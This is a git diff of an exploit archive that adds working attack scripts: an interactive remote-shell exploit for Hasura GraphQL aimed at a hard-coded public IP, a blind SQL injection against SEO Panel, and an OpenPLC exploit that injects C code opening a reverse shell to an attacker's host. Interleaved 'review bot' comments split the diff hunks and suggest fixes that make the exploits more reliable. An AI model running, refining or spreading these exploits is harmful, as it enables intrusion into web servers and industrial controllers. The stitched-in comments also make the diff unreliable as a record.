diff --git a/exploits/hardware/webapps/49775.html b/exploits/hardware/webapps/49775.html index ce3832d4d..4622e00ee 100644 --- a/exploits/hardware/webapps/49775.html +++ b/exploits/hardware/webapps/49775.html @@ -4,7 +4,7 @@ # Version: Firmware V02.03.01.45_pt # CVE: 2021-31152 -# Exploit code: +# Exploit Code:
@@ -14,9 +14,8 @@
- - + \ No newline at end of file diff --git a/exploits/multiple/webapps/49802.py b/exploits/multiple/webapps/49802.py new file mode 100755 index 000000000..8449939e6 --- /dev/null +++ b/exploits/multiple/webapps/49802.py @@ -0,0 +1,41 @@ +# Exploit Title: Hasura GraphQL 1.3.3 - Remote Code Execution +# Software: Hasura GraphQL +# Software Link: https://github.com/hasura/graphql-engine +# Version: 1.3.3 +# Exploit Author: Dolev Farhi +# Date: 4/23/2021 +# Tested on: Ubuntu + +import requests +import sys + +HASURA_SCHEME = 'http' +HASURA_HOST = '192.34.57.144' +HASURA_PORT = 80 + +print('Start typing shell commands...') + +while True: + cmd = input('cmd $> ') + data = { "type":"bulk", + "args":[ + { + "type":"run_sql", + "args":{ + "sql":"SET LOCAL statement_timeout = 10000;","cascade":False,"read_only":False} + }, + { + "type":"run_sql", + "args":{ + "sql":"DROP TABLE IF EXISTS cmd_exec;\nCREATE TABLE cmd_exec(cmd_output text);\nCOPY cmd_exec FROM PROGRAM '" + cmd + "';\nSELECT * FROM cmd_exec;","cascade":False,"read_only":False} + } + ] + } + endpoint = '{}://{}:{}/v1/query'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT) + r = requests.post(endpoint, json=data) + if r.ok: + try: + for i in r.json()[1]['result']: + print(''.join(i)) + except: + print(r.json()) \ No newline at end of file diff --git a/exploits/php/webapps/49642.txt b/exploits/php/webapps/49642.txt index 8264bcba8..1b2b9d016 100644 --- a/exploits/php/webapps/49642.txt +++ b/exploits/php/webapps/49642.txt @@ -5,7 +5,7 @@ # Software Link: https://github.com/TribalSystems/Zenario/releases/tag/8.8 # Version: 8.8.53370 # Tested on: Windows 10 Pro 19041 (x64_86) + XAMPP 7.4.14 - +# CVE: CVE-2021-26830 # Reference - https://edhunter484.medium.com/blind-sql-injection-on-zenario-cms-b58b6820c32d Step 1 - Login to the zenario cms with admin credentials. diff --git a/exploits/php/webapps/49666.txt b/exploits/php/webapps/49666.txt index f0db91ef8..c09f918d5 100644 --- a/exploits/php/webapps/49666.txt 
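Review bot: The header comments (`# Tested on: Ubuntu` and above) do not state the two preconditions the request depends on, which are also the mitigation boundary for anyone assessing exposure: `requests.post(endpoint, json=data)` sends no admin-secret header, so presumably only a `/v1/query` endpoint running without `HASURA_GRAPHQL_ADMIN_SECRET` accepts it, and `COPY ... FROM PROGRAM` is refused unless the engine's database role is a superuser or a member of `pg_execute_server_program`. I would add `# Requires: /v1/query reachable without an admin secret; DB role permitted to run COPY FROM PROGRAM` to the header. Separately, the trailing bare `except:` hides why the result could not be read, and the fallback `print(r.json())` parses the body a second time and raises itself when the response is not JSON; `except (ValueError, LookupError, TypeError):` followed by `print(r.text)` would report the actual response instead. The hard-coded `HASURA_HOST = '192.34.57.144'` is a specific public address rather than a placeholder; it should be an obvious placeholder or a CLI argument as the sibling scripts use.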
+++ b/exploits/php/webapps/49666.txt
@@ -1,4 +1,4 @@
-# Exploit Title: SEO Panel 4.8.0 - 'order_col' Blind SQL Injection
+# Exploit Title: SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (1)
 # Date: 17/02/2021
 # Exploit Author: Piyush Patil
 # Vendor Homepage: https://www.seopanel.org/
diff --git a/exploits/php/webapps/49804.py b/exploits/php/webapps/49804.py
new file mode 100755
index 000000000..b2cff60c4
--- /dev/null
+++ b/exploits/php/webapps/49804.py
@@ -0,0 +1,59 @@ +# Exploit Title: SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (2) +# Author: nu11secur1ty +# Testing and Debugging: nu11secur1ty +# Date: 04/25/2021 +# Vendor: https://www.seopanel.org/ +# Link: https://www.seopanel.org/spdownload/4.8.0 +# CVE: CVE-2021-28419 + +[+] Exploit Source: + +#!/usr/bin/python3 +# Author: @nu11secur1ty +# CVE-2021-28419 + +from selenium import webdriver +import time + + +#enter the link to the website you want to automate login. +website_link="http://192.168.1.3/seopanel/login.php" + +#enter your login username +username="spadmin" + +#enter your login password +password="spadmin" + +#enter the element for username input field +element_for_username="userName" + +#enter the element for password input field +element_for_password="password" + +#enter the element for submit button +element_for_submit="login" + + +browser = webdriver.Chrome() +browser.get((website_link)) + +try: +username_element = browser.find_element_by_name(element_for_username) +username_element.send_keys(username) +password_element = browser.find_element_by_name(element_for_password) +password_element.send_keys(password) +signInButton = browser.find_element_by_name(element_for_submit) +signInButton.click() + +# Exploit +browser.get((" +http://192.168.1.3/seopanel/archive.php?from_time=2021-04-25&order_col=(SELECT +7397 FROM +(SELECT(SLEEP(15)))nu11secur1ty)&order_val=DESC&report_type=website-search-reports&search_name=&sec=viewWebsiteSearchSummary&to_time=2021-04-25&website_id=1")) + +print("payload is deployed MySQL is not responding correctly...\n") + +except Exception: +#### This exception occurs if the element are not found in the webpage. +print("Some error occured :(") \ No newline at end of file diff --git a/exploits/python/webapps/49803.py b/exploits/python/webapps/49803.py new file mode 100755 index 000000000..a91032e48 --- /dev/null +++ b/exploits/python/webapps/49803.py 
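Review bot: As committed the file is not parseable Python even though it is stored as `.py` and indexed as such: the `[+] Exploit Source:` line precedes the shebang and is not a comment, the bodies under `try:` and `except Exception:` are not indented, and the `browser.get((" ... "))` URL literal is broken across several physical lines, so the interpreter rejects the file before any request is made. Either keep the write-up prose as `#` comments with the code indented as the author presumably ran it, or store the entry as `.txt` like the sibling `49666.txt` it is numbered after. The broad `except Exception:` that prints only `Some error occured :(` also discards the exception, so a reader cannot tell a missing form field from a driver problem; `except Exception as exc: print(f"Some error occured :( {exc!r}")` keeps the cause visible.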
@@ -0,0 +1,109 @@ +# Exploit Title: OpenPLC 3 - Remote Code Execution (Authenticated) +# Date: 25/04/2021 +# Exploit Author: Fellipe Oliveira +# Vendor Homepage: https://www.openplcproject.com/ +# Software Link: https://github.com/thiagoralves/OpenPLC_v3 +# Version: OpenPLC v3 +# Tested on: Ubuntu 16.04,Debian 9,Debian 10 Buster + +#/usr/bin/python3 + +import requests +import sys +import time +import optparse +import re + +parser = optparse.OptionParser() +parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://target-uri:8080)") +parser.add_option('-l', '--user', action="store", dest="user", help="User credential to login") +parser.add_option('-p', '--passw', action="store", dest="passw", help="Pass credential to login") +parser.add_option('-i', '--rip', action="store", dest="rip", help="IP for Reverse Connection") +parser.add_option('-r', '--rport', action="store", dest="rport", help="Port for Reverse Connection") + +options, args = parser.parse_args() +if not options.url: + print('[+] Remote Code Execution on OpenPLC_v3 WebServer') + print('[+] Specify an url target') + print("[+] Example usage: exploit.py -u http://target-uri:8080 -l admin -p admin -i 192.168.1.54 -r 4444") + exit() + +host = options.url +login = options.url + '/login' +upload_program = options.url + '/programs' +compile_program = options.url + '/compile-program?file=681871.st' +run_plc_server = options.url + '/start_plc' +user = options.user +password = options.passw +rev_ip = options.rip +rev_port = options.rport +x = requests.Session() + +def auth(): + print('[+] Remote Code Execution on OpenPLC_v3 WebServer') + time.sleep(1) + print('[+] Checking if host '+host+' is Up...') + host_up = x.get(host) + try: + if host_up.status_code == 200: + print('[+] Host Up! 
...') + except: + print('[+] This host seems to be down :( ') + sys.exit(0) + + print('[+] Trying to authenticate with credentials '+user+':'+password+'') + time.sleep(1) + submit = { + 'username': user, + 'password': password + } + x.post(login, data=submit) + response = x.get(upload_program) + + if len(response.text) > 30000 and response.status_code == 200: + print('[+] Login success!') + time.sleep(1) + else: + print('[x] Login failed :(') + sys.exit(0) + +def injection(): + print('[+] PLC program uploading... ') + upload_url = host + "/upload-program" + upload_cookies = {"session": ".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvgPw.qwEcF3rMliGcTgQ4zI4RInBZrqE"} + upload_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------210749863411176965311768214500", "Origin": host, "Connection": "close", "Referer": host + "/programs", "Upgrade-Insecure-Requests": "1"} + upload_data = "-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; name=\"file\"; filename=\"program.st\"\r\nContent-Type: application/vnd.sailingtracker.track\r\n\r\nPROGRAM prog0\n VAR\n var_in : BOOL;\n var_out : BOOL;\n END_VAR\n\n var_out := var_in;\nEND_PROGRAM\n\n\nCONFIGURATION Config0\n\n RESOURCE Res0 ON PLC\n TASK Main(INTERVAL := T#50ms,PRIORITY := 0);\n PROGRAM Inst0 WITH Main : prog0;\n END_RESOURCE\nEND_CONFIGURATION\n\r\n-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; 
name=\"submit\"\r\n\r\nUpload Program\r\n-----------------------------210749863411176965311768214500--\r\n" + upload = x.post(upload_url, headers=upload_headers, cookies=upload_cookies, data=upload_data) + + act_url = host + "/upload-program-action" + act_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------374516738927889180582770224000", "Origin": host, "Connection": "close", "Referer": host + "/upload-program", "Upgrade-Insecure-Requests": "1"} + act_data = "-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_name\"\r\n\r\nprogram.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_descr\"\r\n\r\n\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_file\"\r\n\r\n681871.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"epoch_time\"\r\n\r\n1617682656\r\n-----------------------------374516738927889180582770224000--\r\n" + upload_act = x.post(act_url, headers=act_headers, data=act_data) + time.sleep(2) + +def connection(): + print('[+] Attempt to Code injection...') + inject_url = host + "/hardware" + inject_dash = host + "/dashboard" + inject_cookies = {"session": ".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvyFA.2NQ7ZYcNZ74ci2miLkefHCai2Fk"} + inject_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) 
Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------289530314119386812901408558722", "Origin": host, "Connection": "close", "Referer": host + "/hardware", "Upgrade-Insecure-Requests": "1"} + inject_data = "-----------------------------289530314119386812901408558722\r\nContent-Disposition: form-data; name=\"hardware_layer\"\r\n\r\nblank_linux\r\n-----------------------------289530314119386812901408558722\r\nContent-Disposition: form-data; name=\"custom_layer_code\"\r\n\r\n#include \"ladder.h\"\r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nint ignored_bool_inputs[] = {-1};\r\nint ignored_bool_outputs[] = {-1};\r\nint ignored_int_inputs[] = {-1};\r\nint ignored_int_outputs[] = {-1};\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nvoid initCustomLayer()\r\n{\r\n \r\n \r\n \r\n}\r\n\r\n\r\nvoid updateCustomIn()\r\n{\r\n\r\n}\r\n\r\n\r\nvoid updateCustomOut()\r\n{\r\n int port = "+rev_port+";\r\n struct sockaddr_in revsockaddr;\r\n\r\n int sockt = socket(AF_INET, SOCK_STREAM, 0);\r\n revsockaddr.sin_family = AF_INET; \r\n revsockaddr.sin_port = htons(port);\r\n revsockaddr.sin_addr.s_addr = inet_addr(\""+rev_ip+"\");\r\n\r\n connect(sockt, (struct sockaddr *) &revsockaddr, \r\n sizeof(revsockaddr));\r\n dup2(sockt, 0);\r\n dup2(sockt, 1);\r\n dup2(sockt, 2);\r\n\r\n char * const argv[] = {\"/bin/sh\", NULL};\r\n execve(\"/bin/sh\", argv, NULL);\r\n\r\n return 0; \r\n 
\r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n-----------------------------289530314119386812901408558722--\r\n" + inject = x.post(inject_url, headers=inject_headers, cookies=inject_cookies, data=inject_data) + time.sleep(3) + comp = x.get(compile_program) + time.sleep(6) + x.get(inject_dash) + time.sleep(3) + print('[+] Spawning Reverse Shell...') + start = x.get(run_plc_server) + time.sleep(1) + if start.status_code == 200: + print('[+] Reverse connection receveid!') + sys.exit(0) + else: + print('[+] Failed to receive connection :(') + sys.exit(0) + +auth() +injection() +connection() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 0b130fd70..99976167e 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -43881,7 +43881,7 @@ id,file,description,date,author,type,platform,port 49657,exploits/php/webapps/49657.txt,"WoWonder Social Network Platform 3.1 - 'event_id' SQL Injection",2021-03-17,securityforeveryone.com,webapps,php, 49659,exploits/multiple/webapps/49659.html,"VestaCP 0.9.8 - File Upload CSRF",2021-03-17,"Fady Mohammed Osman",webapps,multiple, 49662,exploits/multiple/webapps/49662.txt,"VestaCP 0.9.8 - 'v_interface' Add IP Stored XSS",2021-03-18,"numan türle",webapps,multiple, -49666,exploits/php/webapps/49666.txt,"SEO Panel 4.8.0 - 'order_col' Blind SQL Injection",2021-03-18,"Piyush Patil",webapps,php, +49666,exploits/php/webapps/49666.txt,"SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (1)",2021-03-18,"Piyush Patil",webapps,php, 49667,exploits/php/webapps/49667.txt,"Hestia Control Panel 1.3.2 - Arbitrary File Write",2021-03-18,"numan türle",webapps,php, 49668,exploits/multiple/webapps/49668.txt,"Plone CMS 5.2.3 - 'Title' Stored XSS",2021-03-19,"Piyush Patil",webapps,multiple, 49669,exploits/php/webapps/49669.txt,"LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS",2021-03-19,"Clément Cruchet",webapps,php, 
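Review bot: In `auth()` the down-host branch is unreachable for the failure it names: `host_up = x.get(host)` sits before the `try:`, so a connection failure raises `requests.exceptions.ConnectionError` straight out of the script, while the bare `except:` only wraps the `status_code == 200` comparison, which cannot raise. Move the `x.get(host)` call inside the `try` and narrow the handler to `except requests.exceptions.RequestException:` so the `[+] This host seems to be down :(` message is actually reachable; note that a host answering anything other than 200 currently falls through silently to the login step. The final success message is also misleading: `if start.status_code == 200:` proves only that `GET /start_plc` returned 200, not that any connection was received, so `print('[+] start_plc returned 200; check the listener')` would state what was actually observed (and fix the `receveid` typo). The login check `len(response.text) > 30000` is a page-size heuristic and deserves a comment saying so, e.g. `# the /programs page is only rendered in full for a logged-in session`.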
@@ -43952,6 +43952,7 @@ id,file,description,date,author,type,platform,port
 49772,exploits/multiple/webapps/49772.py,"htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS)",2021-04-15,nu11secur1ty,webapps,multiple,
 49774,exploits/php/webapps/49774.py,"GetSimple CMS My SMTP Contact Plugin 1.1.1 - CSRF to RCE",2021-04-16,boku,webapps,php,
 49775,exploits/hardware/webapps/49775.html,"Multilaser Router RE018 AC1200 - Cross-Site Request Forgery (Enable Remote Access)",2021-04-21,"Rodolfo Mariano",webapps,hardware,
+49802,exploits/multiple/webapps/49802.py,"Hasura GraphQL 1.3.3 - Remote Code Execution",2021-04-26,"Dolev Farhi",webapps,multiple,
 49777,exploits/php/webapps/49777.txt,"Fast PHP Chat 1.3 - 'my_item_search' SQL Injection",2021-04-21,"Fatih Coskun",webapps,php,
 49778,exploits/php/webapps/49778.txt,"WordPress Plugin RSS for Yandex Turbo 1.29 - Stored Cross-Site Scripting (XSS)",2021-04-21,"Himamshu Dilip Kulkarni",webapps,php,
 49779,exploits/php/webapps/49779.txt,"BlackCat CMS 1.3.6 - 'Multiple' Stored Cross-Site Scripting (XSS)",2021-04-21,"Ömer Hasan Durmuş",webapps,php,
@@ -43973,3 +43974,5 @@ id,file,description,date,author,type,platform,port
 49799,exploits/multiple/webapps/49799.py,"DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS)",2021-04-23,nu11secur1ty,webapps,multiple,
 49800,exploits/hardware/webapps/49800.html,"Sipwise C5 NGCP CSC - 'Multiple' Stored/Reflected Cross-Site Scripting (XSS)",2021-04-23,LiquidWorm,webapps,hardware,
 49801,exploits/hardware/webapps/49801.html,"Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF)",2021-04-23,LiquidWorm,webapps,hardware,
+49803,exploits/python/webapps/49803.py,"OpenPLC 3 - Remote Code Execution (Authenticated)",2021-04-26,"Fellipe Oliveira",webapps,python,
+49804,exploits/php/webapps/49804.py,"SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (2)",2021-04-26,nu11secur1ty,webapps,php,
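Review bot: The new `49802` row in the `@@ -43952` hunk is inserted between `49775` and `49777`, breaking the ascending `id` order that the surrounding rows keep and that the `@@ -43973` hunk itself follows by appending `49803` and `49804` at the end. Move the `49802,exploits/multiple/webapps/49802.py,...` line to just before the `49803` row so the index stays monotonic by id.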